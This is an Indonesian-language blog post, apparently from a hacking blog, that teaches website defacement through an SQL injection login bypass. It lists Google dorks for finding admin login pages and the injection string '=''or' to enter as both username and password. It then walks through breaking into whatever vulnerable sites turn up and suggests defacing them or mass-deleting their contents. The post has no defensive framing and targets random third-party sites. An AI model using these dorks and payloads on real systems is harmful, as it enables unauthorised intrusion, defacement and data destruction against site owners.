Deface Dengan Bypass Admin adalah poc
deface yang memanfaatkan celah sqli yang ada pada halaman login.
Metode bypass admin ini termasuk poc paling mudah diantara poc yang lainnya
Baikla sekarang sediakan alat alat tempurnya :
Metode bypass admin ini termasuk poc paling mudah diantara poc yang lainnya
Baikla sekarang sediakan alat alat tempurnya :
- handpone atau lepi
- Internet
- kesabaran
Dork
- inurl:/admin/login.php
- inurl:/administrator/ intitle:login
- inurl:/admin/ intitle:panel
Exploit
- Username : '=''or' atau '=' 'or'
- Password : '=''or' atau '=' 'or'
Tutorial
1. Dorking pake dork di atas. Di sini saya udah siapin target
2. Kalo udah nemu target, kolom username sama password diisi exploit tadi. Boleh '=''or' atau '=' 'or'. Setelah itu klik log in.
3. Boom!! Udah berhasil masuk deh (bagi yang vuln), kalo gak berhasil masuk cari lagi kembangin dorknya jangan maunya ngemis mulu kampang.
4. Serah lu deh mau ngapain, ngindex kek, apa mungkin mass delete lah. Eh jangan lah koplok kasian kalo mass delete :"v
Udah mungkin gitu aja untuk tutor kali ini. Satu kalimat buat kalian semua, semoga bisa menginspirasi. "Jangan mudah menyerah, k0nd0m masih banyak".
Terimakasih telah berkunjung ke blog darksec, tunggu tutorial tutorial menarik lainnya. Selamat Beraktivitas.
 |
| Sumber : http://www.xmall75-tech.ga |
Terimakasih telah berkunjung ke blog darksec, tunggu tutorial tutorial menarik lainnya. Selamat Beraktivitas.
No comments:
Post a Comment
Berkomentarlah dengan sopan